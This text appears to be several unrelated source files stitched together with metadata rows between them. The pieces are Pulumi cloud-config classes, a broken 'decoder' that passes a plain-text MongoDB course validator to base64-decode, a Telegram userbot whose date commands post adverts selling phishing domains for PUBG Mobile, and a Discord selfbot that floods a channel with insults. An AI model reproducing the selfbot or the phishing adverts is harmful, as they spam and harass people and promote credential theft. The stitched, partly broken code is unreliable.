        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: pulumi.Input[str]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class OceanUpdatePolicyArgs:
    """Controls whether and how a cluster roll happens after an update."""

    def __init__(__self__, *,
                 should_roll: pulumi.Input[bool],
                 conditioned_roll: Optional[pulumi.Input[bool]] = None,
                 roll_config: Optional[pulumi.Input['OceanUpdatePolicyRollConfigArgs']] = None):
        """
        :param pulumi.Input[bool] should_roll: Enables the roll.
        :param pulumi.Input[bool] conditioned_roll: Spot will perform a cluster Roll in accordance with a relevant modification of the cluster’s settings. When set to true , only specific changes in the cluster’s configuration will trigger a cluster roll (such as AMI, Key Pair, user data, instance types, load balancers, etc).
        :param pulumi.Input['OceanUpdatePolicyRollConfigArgs'] roll_config: While used, you can control whether the group should perform a deployment after an update to the configuration.
        """
        pulumi.set(__self__, "should_roll", should_roll)
        # Optional attributes are forwarded only when supplied.
        for attr, val in (("conditioned_roll", conditioned_roll),
                          ("roll_config", roll_config)):
            if val is not None:
                pulumi.set(__self__, attr, val)

    @property
    @pulumi.getter(name="shouldRoll")
    def should_roll(self) -> pulumi.Input[bool]:
        """Enables the roll."""
        return pulumi.get(self, "should_roll")

    @should_roll.setter
    def should_roll(self, value: pulumi.Input[bool]):
        pulumi.set(self, "should_roll", value)

    @property
    @pulumi.getter(name="conditionedRoll")
    def conditioned_roll(self) -> Optional[pulumi.Input[bool]]:
        """Spot will perform a cluster Roll in accordance with a relevant modification of the cluster’s settings. When set to true , only specific changes in the cluster’s configuration will trigger a cluster roll (such as AMI, Key Pair, user data, instance types, load balancers, etc)."""
        return pulumi.get(self, "conditioned_roll")

    @conditioned_roll.setter
    def conditioned_roll(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "conditioned_roll", value)

    @property
    @pulumi.getter(name="rollConfig")
    def roll_config(self) -> Optional[pulumi.Input['OceanUpdatePolicyRollConfigArgs']]:
        """While used, you can control whether the group should perform a deployment after an update to the configuration."""
        return pulumi.get(self, "roll_config")

    @roll_config.setter
    def roll_config(self, value: Optional[pulumi.Input['OceanUpdatePolicyRollConfigArgs']]):
        pulumi.set(self, "roll_config", value)
@pulumi.input_type
class OceanUpdatePolicyRollConfigArgs:
    """Batch sizing and scope for a cluster roll."""

    def __init__(__self__, *,
                 batch_size_percentage: pulumi.Input[int],
                 launch_spec_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        :param pulumi.Input[int] batch_size_percentage: Sets the percentage of the instances to deploy in each batch.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] launch_spec_ids: List of virtual node group identifiers to be rolled.
        """
        pulumi.set(__self__, "batch_size_percentage", batch_size_percentage)
        # Optional attribute is forwarded only when supplied.
        if launch_spec_ids is not None:
            pulumi.set(__self__, "launch_spec_ids", launch_spec_ids)

    @property
    @pulumi.getter(name="batchSizePercentage")
    def batch_size_percentage(self) -> pulumi.Input[int]:
        """Sets the percentage of the instances to deploy in each batch."""
        return pulumi.get(self, "batch_size_percentage")

    @batch_size_percentage.setter
    def batch_size_percentage(self, value: pulumi.Input[int]):
        pulumi.set(self, "batch_size_percentage", value)

    @property
    @pulumi.getter(name="launchSpecIds")
    def launch_spec_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """List of virtual node group identifiers to be rolled."""
        return pulumi.get(self, "launch_spec_ids")

    @launch_spec_ids.setter
    def launch_spec_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "launch_spec_ids", value)
@pulumi.input_type
class SuspensionSuspensionArgs:
    """A single process to suspend on the group."""

    def __init__(__self__, *,
                 name: pulumi.Input[str]):
        """
        :param pulumi.Input[str] name: The name of process to suspend. Valid values: `"AUTO_HEALING" , "OUT_OF_STRATEGY", "PREVENTIVE_REPLACEMENT", "REVERT_PREFERRED", or "SCHEDULING"`.
        """
        pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """The name of process to suspend. Valid values: `"AUTO_HEALING" , "OUT_OF_STRATEGY", "PREVENTIVE_REPLACEMENT", "REVERT_PREFERRED", or "SCHEDULING"`."""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)
| 42.014738
| 549
| 0.661079
| 46,873
| 401,955
| 5.485375
| 0.024726
| 0.103148
| 0.063816
| 0.040569
| 0.901718
| 0.864598
| 0.829132
| 0.79123
| 0.772414
| 0.751093
| 0
| 0.001814
| 0.224956
| 401,955
| 9,566
| 550
| 42.01913
| 0.823511
| 0.271458
| 0
| 0.766599
| 1
| 0
| 0.134094
| 0.060874
| 0
| 0
| 0
| 0
| 0
| 1
| 0.210249
| false
| 0
| 0.000851
| 0.006639
| 0.327886
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4521cebdc87164bfa8eae408f39649f22c0d58f6
| 13,818
|
py
|
Python
|
src/m101p/final/q4/validate_decoder.py
|
hemmerling/nosql-mongodb2013
|
bd2bb4f76234e0732b738f14cb474f7554c864c1
|
[
"Apache-2.0"
] | null | null | null |
src/m101p/final/q4/validate_decoder.py
|
hemmerling/nosql-mongodb2013
|
bd2bb4f76234e0732b738f14cb474f7554c864c1
|
[
"Apache-2.0"
] | null | null | null |
src/m101p/final/q4/validate_decoder.py
|
hemmerling/nosql-mongodb2013
|
bd2bb4f76234e0732b738f14cb474f7554c864c1
|
[
"Apache-2.0"
] | null | null | null |
import base64
code="
import pymongo
import urllib2
import urllib
import cookielib
import random
import re
import string
import sys
import getopt

# init the global cookie jar
cj = cookielib.CookieJar()
# declare the variables to connect to db
connection = None
db = None
webhost = "localhost:8082"
mongostr = "mongodb://localhost:27017"
db_name = "blog"

# this script will check that homework 3.2 is correct

# makes a little salt
def make_salt(n):
    """Return a random string of n ASCII letters (throwaway fixture data).

    Equivalent to the previous concatenation loop (same sequence of
    random.choice calls), but str.join is linear instead of quadratic.
    """
    return "".join(random.choice(string.ascii_letters) for _ in range(n))


# this is a validation script to make sure the blog works correctly.

def create_user(username, password):
    """Sign up a test user via the blog's /signup form.

    Returns True when the user shows up both in the `users` collection and
    in the rendered "Welcome <username>" response; False otherwise.
    """
    global cj

    try:
        print "Trying to create a test user ", username
        url = "http://{0}/signup".format(webhost)

        data = urllib.urlencode([("email",""),("username",username), ("password",password), ("verify",password)])
        request = urllib2.Request(url=url, data=data)
        # Route through the shared cookie jar so the session carries over
        # into the later login/post steps.
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
        f = opener.open(request)

        users = db.users
        # check that the user is in users collection
        user = users.find_one({'_id':username})
        if (user == None):
            print "Could not find the test user ", username, "in the users collection."
            return False
        print "Found the test user ", username, " in the users collection"

        # check that the user has been built
        result = f.read()
        expr = re.compile("Welcome\s+"+ username)
        if expr.search(result):
            return True

        print "When we tried to create a user, here is the output we got\n"
        print result

        return False
    except:
        print "the request to ", url, " failed, so your blog may not be running."
        raise
        # NOTE(review): unreachable — `raise` above re-throws before this runs.
        return False


def try_to_login(username, password):
    """Log the test user in via /login.

    True iff the response contains "Welcome <username>"; False on any
    failure (including a connection error, which is swallowed here).
    """

    try:
        print "Trying to login for test user ", username
        url = "http://{0}/login".format(webhost)

        data = urllib.urlencode([("username",username), ("password",password)])
        request = urllib2.Request(url=url, data=data)
        # Shared cookie jar keeps the session for later authenticated calls.
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
        f = opener.open(request)

        # check for successful login
        result = f.read()
        expr = re.compile("Welcome\s+"+ username)
        if expr.search(result):
            return True

        print "When we tried to login, here is the output we got\n"
        print result
        return False
    except:
        print "the request to ", url, " failed, so your blog may not be running."
        return False


def add_blog_post(title,post,tags):
    """Submit a new post through /newpost.

    True iff the rendered response shows `title` followed (anywhere) by
    `post`; False otherwise.
    """

    try:
        print "Trying to submit a post with title ", title
        data = urllib.urlencode([("body",post), ("subject",title), ("tags",tags)])
        url = "http://{0}/newpost".format(webhost)
        request = urllib2.Request(url=url, data=data)
        # Attach the session cookie captured during signup/login.
        cj.add_cookie_header(request)
        opener = urllib2.build_opener()
        f = opener.open(request)

        # check for successful login
        result = f.read()
        # NOTE(review): title/post are interpolated into the regex unescaped;
        # titles with regex metacharacters would break this check.
        expr = re.compile(title + ".+" + post, re.DOTALL)

        if expr.search(result):
            return True

        print "When we tried to post, here is the output we got\n"
        print result
        return False

    except:
        print "the request to ", url, " failed, so your blog may not be running."
        raise

        # NOTE(review): unreachable after `raise`.
        return False

def add_blog_comment(title,post):
    """Post a random comment on the entry titled `title` and verify it landed
    both on the rendered page and inside the post document in MongoDB.
    """

    try:
        print "+Trying to submit a blog comment for post with title", title
        url = "http://{0}/newcomment".format(webhost)

        # check_mongo_for_post is defined elsewhere in the original script;
        # presumably it fills doc['doc'] with the post document — verify
        # against the full source.
        doc = {}
        check_mongo_for_post(title, post, doc)

        permalink = doc['doc']['permalink']

        comment_name = make_salt(12)
        comment_body = make_salt(12)

        data = urllib.urlencode([("commentName",comment_name), ("commentBody",comment_body), ("permalink",permalink)])
        request = urllib2.Request(url=url, data=data)
        cj.add_cookie_header(request)
        opener = urllib2.build_opener()
        f = opener.open(request)

        # check for successful addition of comment on page
        result = f.read()
        expr = re.compile(title + ".+" + post, re.DOTALL)

        if not expr.search(result):
            print "When we tried to find the comment we posted at the  ", url, " here is what we got"
            print result
            return False


        # check for successful addition of comment..retrieve the doc again
        if(not check_mongo_for_post(title, post, doc)):
            print "Could not find comment in database"
            return False

        # Scan the refreshed document for the exact comment we just posted.
        found = False
        if ('comments' in doc['doc']):
            for comment in doc['doc']['comments']:
                if (comment['body'] == comment_body and comment['author'] == comment_name):
                    found = True

        return found

    except:
        print "the request to ", url, " failed, so your blog may not be running."
        raise

        # NOTE(review): unreachable after `raise`.
        return False


# fetch the blog home page and return the link of the first post
def fetch_blog_home_page(posts):
    """Fetch the blog home page and append the first post's link to `posts`.

    Returns True on success, False when no post link could be found.
    """

    try:
        url = "http://{0}/".format(webhost)
        print "Trying to grab the blog home page at url and find the first post.", url
        request = urllib2.Request(url=url)
        cj.add_cookie_header(request)
        opener = urllib2.build_opener()
        f = opener.open(request)

        # Look for a post
        result = f.read()
        # The first <a href="..."> anchor on the page is assumed to be a
        # post link.
        expr = re.compile("<a href=\"([^\"]+)\"\w*?>", re.DOTALL)


        match = expr.search(result)

        if match is not None:
            print "Fount a post url: ", match.group(1)
            posts.append(match.group(1))
            return True


        print "Hmm, can't seem to find a post. Is the blog populated with posts?"
        print "When we tried to read the blog index at ", url, " here is what we got"
        print result
        return False

    except:
        print "the request to ", url, " failed, so your blog may not be running."
        raise

        # NOTE(review): unreachable after `raise`.
        return False

# gets the likes value off the first commment or returns None
def fetch_likes(url):
    """Return the Likes count of the first comment on the permalink page
    `url` (a site-relative path), or None when it cannot be read.
    """

    try:
        # Rebinds the parameter: relative path -> absolute URL.
        url = "http://{0}{1}".format(webhost, url)
        print "Trying to grab the number of likes for url ", url
        request = urllib2.Request(url=url)
        cj.add_cookie_header(request)
        opener = urllib2.build_opener()
        f = opener.open(request)


        # let's get the first form element
        result = f.read()
        # Matches the first <form> that contains "Likes: <n>".
        expr = re.compile("<form[^>]*>.*?Likes:\s*(\d+)\s*<.*?</form>", re.DOTALL)

        match = expr.search(result)

        if match is not None:
            print "Likes value ", match.group(1)
            return int(match.group(1))

        print "Can't fetch the like value for the first comment. Perhaps the blog entry has no comments?"
        print "When we tried to read the blog permalink at ", url, " here is what we got"
        return None

    except:
        print "the request to ", url, " failed, so your blog may not be running."
        raise

        # NOTE(review): unreachable after `raise`.
        return None


# gets the likes value off the first commment or returns None
def click_on_like(permalink):
    """POST a Like for the first comment (ordinal 0) of `permalink`.

    Returns True on success, False when the permalink cannot be parsed;
    a connection failure is re-raised.
    """

    print "Clicking on Like link for post: ", permalink
    try:
        # Strip the leading path segment: "post/abc" -> "abc".
        expr =  re.compile("[^/]+/([^/]+)")
        match = expr.search(permalink)
        if match is None:
            return False

        permalink = match.group(1)
        url = "http://{0}/like".format(webhost)
        # print "Like POST url", url

        data = urllib.urlencode([("permalink",permalink), ("comment_ordinal","0")])
        request = urllib2.Request(url=url, data=data)
        cj.add_cookie_header(request)
        opener = urllib2.build_opener()
        f = opener.open(request)

        return True

    except:
        print "the request to ", url, " failed, so your blog may not be running."
        raise




# command line arg parsing to make folks happy who want to run at mongolabs or mongohq
# this functions uses global vars to communicate. forgive me.
def arg_parsing(argv):
    """Parse -p/-m/-d command-line flags.

    Communicates its results by mutating the module globals `webhost`,
    `mongostr` and `db_name` rather than by returning values.
    """

    global webhost
    global mongostr
    global db_name

    try:
        opts, args = getopt.getopt(argv, "-p:-m:-d:")
    except getopt.GetoptError:
        print "usage validate.py -p webhost -m mongoConnectString -d databaseName"
        print "\twebhost defaults to {0}".format(webhost)
        print "\tmongoConnectionString default to {0}".format(mongostr)
        print "\tdatabaseName defaults to {0}".format(db_name)
        sys.exit(2)
    for opt, arg in opts:
        # NOTE(review): '-h' is not declared in the getopt spec above, so this
        # branch can never match a parsed option.
        if (opt == '-h'):
            print "usage validate.py -p webhost -m mongoConnectString -d databaseName"
            sys.exit(2)
        # NOTE(review): `opt in ("-p")` is a substring test on a plain string,
        # not tuple membership; it works here only because opt == "-p" exactly.
        elif opt in ("-p"):
            webhost = arg
            print "Overriding HTTP host to be ", webhost
        elif opt in ("-m"):
            mongostr = arg
            print "Overriding MongoDB connection string to be ", mongostr
        elif opt in ("-d"):
            db_name = arg
            print "Overriding MongoDB database to be ", db_name
            


# main section of the code
def main(argv):
    """Drive the Final Exam Q4 check: find a post, click Like, verify +1."""

    arg_parsing(argv)
    global connection
    global db

    print "Welcome to the M101 Final Exam, Question 4 Validation Checker"

    # connect to the db (mongostr was set in arg_parsing)
    connection = pymongo.Connection(mongostr, safe=True)
    db = connection[db_name]


    # grab the blog home page and find the first post
    posts = []
    if (not fetch_blog_home_page(posts)):
        print "I can't grab the home page of the blog"
        sys.exit(1)

    # now go to the permalink page for that post
    likes_value = fetch_likes(posts[0])

    if (likes_value is  None):
        print "Can't fetch the like value"
        sys.exit(1)

    click_on_like(posts[0])

    # Re-read the page; the first comment's Likes counter must have gone up
    # by exactly one.
    new_likes_value = fetch_likes(posts[0])

    if (new_likes_value != (likes_value + 1)):
        print "I was not able to increment the likes on a comment"
        print "old likes value was ", likes_value
        print "likes value after I clicked was ", new_likes_value
        print "Sorry, you have not solved it yet."
        sys.exit(1)


    print "Tests Passed for Final 4. Your validation code is 3f837hhg673ghd93hgf8"


if __name__ == "__main__":
    main(sys.argv[1:])







"
s = base64.b64decode(code)
print s
| 2,303
| 13,767
| 0.998697
| 10
| 13,818
| 1,380
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095228
| 0.000651
| 13,818
| 5
| 13,768
| 2,763.6
| 0.904121
| 0
| 0
| 0
| 0
| 0
| 0.995875
| 0.995875
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.25
| null | null | 0.25
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e12fcd5fcd554cb1b292cac0d846ae36ab330034
| 165
|
py
|
Python
|
deepdraken/image_generation/gans/__init__.py
|
DevavratSinghBisht/deepdraken
|
66671bee2d677d3e900077c5d1c66c0b1eff2cee
|
[
"Apache-2.0"
] | null | null | null |
deepdraken/image_generation/gans/__init__.py
|
DevavratSinghBisht/deepdraken
|
66671bee2d677d3e900077c5d1c66c0b1eff2cee
|
[
"Apache-2.0"
] | null | null | null |
deepdraken/image_generation/gans/__init__.py
|
DevavratSinghBisht/deepdraken
|
66671bee2d677d3e900077c5d1c66c0b1eff2cee
|
[
"Apache-2.0"
] | null | null | null |
# Public GAN exports for the deepdraken.image_generation.gans package.
# NOTE(review): DCGAN is imported from the `cgan` module (same module as
# CGAN) while WGAN comes from `wgan` — confirm DCGAN shouldn't come from a
# dedicated `dcgan` module instead.
from deepdraken.image_generation.gans.cgan import DCGAN
from deepdraken.image_generation.gans.cgan import CGAN
from deepdraken.image_generation.gans.wgan import WGAN
| 55
| 55
| 0.878788
| 24
| 165
| 5.916667
| 0.375
| 0.295775
| 0.401408
| 0.612676
| 0.838028
| 0.605634
| 0.605634
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 165
| 3
| 56
| 55
| 0.922078
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
e14c323058e3cb60c6ffb1e58a3759985cab70ee
| 8,109
|
py
|
Python
|
userbot/modules/data-channel.py
|
RiSecID/Auto
|
d06ef712666a35ddbf0c123dbb86705096cbbb56
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/data-channel.py
|
RiSecID/Auto
|
d06ef712666a35ddbf0c123dbb86705096cbbb56
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/data-channel.py
|
RiSecID/Auto
|
d06ef712666a35ddbf0c123dbb86705096cbbb56
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
# Copyright (C) 2020 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module for getting the date
and time of any country or the userbot server. """
from datetime import datetime as dt
from pytz import country_names as c_n
from pytz import country_timezones as c_tz
from pytz import timezone as tz
from userbot import CMD_HELP, COUNTRY, TZ_NUMBER
from userbot.events import register
async def get_tz(con):
    """ Get time zone of the given country. """
    # `con` arrives .title()-cased from the caller, which breaks several pytz
    # country names; patch those specific cases back.
    # NOTE(review): the guards check for a parenthesised/phrase form but the
    # replace() calls rewrite every occurrence of the substring — confirm this
    # cannot corrupt other parts of a name.
    if "(Uk)" in con:
        con = con.replace("Uk", "UK")
    if "(Us)" in con:
        con = con.replace("Us", "US")
    if " Of " in con:
        con = con.replace(" Of ", " of ")
    if "(Western)" in con:
        con = con.replace("(Western)", "(western)")
    if "Minor Outlying Islands" in con:
        con = con.replace("Minor Outlying Islands", "minor outlying islands")
    if "Nl" in con:
        con = con.replace("Nl", "NL")
    # Exact match against pytz's country-name table -> that country's tz list.
    for c_code in c_n:
        if con == c_n[c_code]:
            return c_tz[c_code]
    # Fall back to treating `con` as a country code; implicitly returns None
    # when it is unknown.
    try:
        if c_n[con]:
            return c_tz[con]
    except KeyError:
        return
#Terimakasih @JejakCheat
@register(outgoing=True, pattern="^.domainanim(?: |$)(.*)(?<![0-9])(?: |$)([0-9]+)?")
async def date_func(dat):
    """ For .date command, return the date of
    1. The country passed as an argument,
    2. The default userbot country(set it by using .settime),
    3. The server where the userbot runs.
    """
    # NOTE(review): this handler is duplicated three times in this module
    # (only the trigger pattern and the canned advert text differ). The
    # repeated `date_func` name is shadowed, but each @register call keeps
    # its own handler alive.
    con = dat.pattern_match.group(1).title()
    tz_num = dat.pattern_match.group(2)
    d_form = "%d/%m/%y - %H:%M:%S"
    c_name = ''
    if len(con) > 4:
        try:
            c_name = c_n[con]
        except KeyError:
            c_name = con
        timezones = await get_tz(con)
    elif COUNTRY:
        c_name = COUNTRY
        tz_num = TZ_NUMBER
        timezones = await get_tz(COUNTRY)
    else:
        # No argument and no configured COUNTRY: post the canned message.
        await dat.edit(f"**BOT [TESTI](t.me/Jejakcheat14)\n**"
                       f"**{dt.now().strftime(d_form)}**\n\n"
                       f"Pembelian Phising `DOMAIN` PUBG Mobile Season 12 `Animation Version`\n"
                       f"Menggunakan `Server 5`\n"
                       f"Order ID : `Tertera pada Screenshot`\n\n"
                       f"Mau Beli Juga ? Chat [Jefanya Efandchris](t.me/JejakCheat14)\n"
                       f"#SenturyBot")
        return
    if not timezones:
        await dat.edit("`Invaild country.`")
        return
    if len(timezones) == 1:
        time_zone = timezones[0]
    elif len(timezones) > 1:
        if tz_num:
            tz_num = int(tz_num)
            time_zone = timezones[tz_num - 1]
        else:
            # Several zones and no index given: list them and bail out.
            return_str = f"`{c_name} has multiple timezones:`\n"
            for i, item in enumerate(timezones):
                return_str += f"`{i+1}. {item}`\n"
            return_str += "\n`Choose one by typing the number "
            return_str += "in the command.`\n"
            return_str += f"Example: .date {c_name} 2"
            await dat.edit(return_str)
            return
    dtnow = dt.now(tz(time_zone)).strftime(d_form)
    if c_name != COUNTRY:
        await dat.edit(
            f"`It's` **{dtnow}** `in {c_name}({time_zone} timezone).`")
        return
    elif COUNTRY:
        await dat.edit(f"`It's` **{dtnow}** `here, in {COUNTRY}"
                       f"({time_zone} timezone).`")
        return
#Terimakasih @JejakCheat
#Terimakasih @JejakCheat
@register(outgoing=True, pattern="^.domaintourney(?: |$)(.*)(?<![0-9])(?: |$)([0-9]+)?")
async def date_func(dat):
    """ For .date command, return the date of
    1. The country passed as an argument,
    2. The default userbot country(set it by using .settime),
    3. The server where the userbot runs.
    """
    # NOTE(review): copy of the .domainanim handler above; only the trigger
    # pattern and the canned advert text differ.
    con = dat.pattern_match.group(1).title()
    tz_num = dat.pattern_match.group(2)
    d_form = "%d/%m/%y - %H:%M:%S"
    c_name = ''
    if len(con) > 4:
        try:
            c_name = c_n[con]
        except KeyError:
            c_name = con
        timezones = await get_tz(con)
    elif COUNTRY:
        c_name = COUNTRY
        tz_num = TZ_NUMBER
        timezones = await get_tz(COUNTRY)
    else:
        # No argument and no configured COUNTRY: post the canned message.
        await dat.edit(f"**BOT [TESTI](t.me/Jejakcheat14)\n**"
                       f"**{dt.now().strftime(d_form)}**\n\n"
                       f"Pembelian Phising `DOMAIN` PUBG Mobile Season 12 `Tournament`\n"
                       f"Menggunakan `Server 5`\n"
                       f"Order ID : `Tertera pada Screenshot`\n\n"
                       f"Mau Beli Juga ? Chat [Jefanya Efandchris](t.me/JejakCheat14)\n"
                       f"#SenturyBot")
        return
    if not timezones:
        await dat.edit("`Invaild country.`")
        return
    if len(timezones) == 1:
        time_zone = timezones[0]
    elif len(timezones) > 1:
        if tz_num:
            tz_num = int(tz_num)
            time_zone = timezones[tz_num - 1]
        else:
            # Several zones and no index given: list them and bail out.
            return_str = f"`{c_name} has multiple timezones:`\n"
            for i, item in enumerate(timezones):
                return_str += f"`{i+1}. {item}`\n"
            return_str += "\n`Choose one by typing the number "
            return_str += "in the command.`\n"
            return_str += f"Example: .date {c_name} 2"
            await dat.edit(return_str)
            return
    dtnow = dt.now(tz(time_zone)).strftime(d_form)
    if c_name != COUNTRY:
        await dat.edit(
            f"`It's` **{dtnow}** `in {c_name}({time_zone} timezone).`")
        return
    elif COUNTRY:
        await dat.edit(f"`It's` **{dtnow}** `here, in {COUNTRY}"
                       f"({time_zone} timezone).`")
        return
#Terimakasih @JejakCheat
@register(outgoing=True, pattern="^.subdomainanim(?: |$)(.*)(?<![0-9])(?: |$)([0-9]+)?")
async def date_func(dat):
    """ For .date command, return the date of
    1. The country passed as an argument,
    2. The default userbot country(set it by using .settime),
    3. The server where the userbot runs.
    """
    # NOTE(review): copy of the .domainanim handler above; only the trigger
    # pattern and the canned advert text differ.
    con = dat.pattern_match.group(1).title()
    tz_num = dat.pattern_match.group(2)
    d_form = "%d/%m/%y - %H:%M:%S"
    c_name = ''
    if len(con) > 4:
        try:
            c_name = c_n[con]
        except KeyError:
            c_name = con
        timezones = await get_tz(con)
    elif COUNTRY:
        c_name = COUNTRY
        tz_num = TZ_NUMBER
        timezones = await get_tz(COUNTRY)
    else:
        # No argument and no configured COUNTRY: post the canned message.
        await dat.edit(f"**BOT [TESTI](t.me/Jejakcheat14)\n**"
                       f"**{dt.now().strftime(d_form)}**\n\n"
                       f"Pembelian Phising `SUBDOMAIN` PUBG Mobile Season 12 `Animation Version`\n"
                       f"Menggunakan `Server 5`\n"
                       f"Order ID : `Tertera pada Screenshot`\n\n"
                       f"Mau Beli Juga ? Chat [Jefanya Efandchris](t.me/JejakCheat14)\n"
                       f"#SenturyBot")
        return
    if not timezones:
        await dat.edit("`Invaild country.`")
        return
    if len(timezones) == 1:
        time_zone = timezones[0]
    elif len(timezones) > 1:
        if tz_num:
            tz_num = int(tz_num)
            time_zone = timezones[tz_num - 1]
        else:
            # Several zones and no index given: list them and bail out.
            return_str = f"`{c_name} has multiple timezones:`\n"
            for i, item in enumerate(timezones):
                return_str += f"`{i+1}. {item}`\n"
            return_str += "\n`Choose one by typing the number "
            return_str += "in the command.`\n"
            return_str += f"Example: .date {c_name} 2"
            await dat.edit(return_str)
            return
    dtnow = dt.now(tz(time_zone)).strftime(d_form)
    if c_name != COUNTRY:
        await dat.edit(
            f"`It's` **{dtnow}** `in {c_name}({time_zone} timezone).`")
        return
    elif COUNTRY:
        await dat.edit(f"`It's` **{dtnow}** `here, in {COUNTRY}"
                       f"({time_zone} timezone).`")
        return
| 32.306773
| 99
| 0.536318
| 1,067
| 8,109
| 3.963449
| 0.149016
| 0.028376
| 0.042563
| 0.027666
| 0.834713
| 0.809175
| 0.797825
| 0.778671
| 0.778671
| 0.778671
| 0
| 0.0136
| 0.329017
| 8,109
| 250
| 100
| 32.436
| 0.763646
| 0.045382
| 0
| 0.836066
| 0
| 0
| 0.280108
| 0.04123
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.032787
| 0
| 0.131148
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e153f8acc4571a1285dcfac65274553d0739f692
| 22,239
|
py
|
Python
|
main.py
|
vanisthevillain/ChatPack
|
f7432cd43eede5984e033e225145810f8d9de37f
|
[
"BSL-1.0"
] | 1
|
2021-12-30T19:16:02.000Z
|
2021-12-30T19:16:02.000Z
|
main.py
|
TheSkidSlayer/ChatPack
|
f7432cd43eede5984e033e225145810f8d9de37f
|
[
"BSL-1.0"
] | null | null | null |
main.py
|
TheSkidSlayer/ChatPack
|
f7432cd43eede5984e033e225145810f8d9de37f
|
[
"BSL-1.0"
] | 1
|
2022-02-10T00:39:21.000Z
|
2022-02-10T00:39:21.000Z
|
import discord, os, random, json
from discord.ext import commands
with open('config.json') as f:
config = json.load(f)
token = config.get('token')
prefix = config.get('prefix')
vanis = commands.Bot(command_prefix=prefix, case_insensitive=True, self_bot=True)
vanis.remove_command("help")
@vanis.event
async def on_ready():
print(f""" \u001b[31m
╔════════════════════════════════════════════╗
╦ ╦╦ ╦╦═╗╔═╗╦ ╦ ╔═╗╦═╗╔═╗╔═╗╔═╗╔═╗╦═╗
╚╦╝║ ║╠╦╝║ ║║ ║ ╠═╝╠╦╝║╣ ╚═╗╚═╗║╣ ╠╦╝
╩ ╚═╝╩╚═╚═╝╚═╝ ╩ ╩╚═╚═╝╚═╝╚═╝╚═╝╩╚═
╚════════════════════════════════════════════╝
To use the presser, type "vanis" in the chat to
activate it.
""")
@vanis.event
async def on_message(message):
channel = message.channel
if message.content.endswith('vanis'):
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
await message.channel.send ('WHY YOU SLOWING DOWN KEEP IT GOING')
await message.channel.send ('WEAK FUCKING BITCH')
await message.channel.send ('FUCKING RETARD DOESNT KNOW WHAT TO SAY')
await message.channel.send ('YOU SUCK PUSSY')
await message.channel.send ('LMFAOOO SHOULD I GIVE MY SON A CHANCE')
await message.channel.send ('WEAK ASS BITCH FOCUS UP SON')
await message.channel.send ('PRAY YOU WONT FOLD TONIGHT')
await message.channel.send ('LMFAOAOAOAO')
await message.channel.send ('WEAK ASS FUCKING TROLL CANT PRESS ME')
await message.channel.send ('FOCUS LOLL UR ASS')
await message.channel.send ('DUMBASS WEAK TROLL')
await message.channel.send ('LOL FUCKING RETARDED BITCH')
await message.channel.send ('DUMB BITCH YOU FEAR ME')
await message.channel.send ('FUCKING TROLL')
await message.channel.send ('U CANT PRESSURE ME')
await message.channel.send ('1')
await message.channel.send ('UR A SKID LOOLOOLOL')
await message.channel.send ('DONT GET TIRED')
await message.channel.send ('LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL')
await message.channel.send ('LLOLOLOLOLOLOLLLOO')
await message.channel.send ('LOOLLOLOLO')
await message.channel.send ('LOLL')
await message.channel.send ('YOU FUCKING SUCK LAME ASS NIGGA')
await message.channel.send ('YOU WEAK BITCH KEEP UP WITH ME')
await message.channel.send ('KEEP CHAT MOVING SON')
await message.channel.send ('NO BREAKS FOR YOU KEEP ON GOING SON')
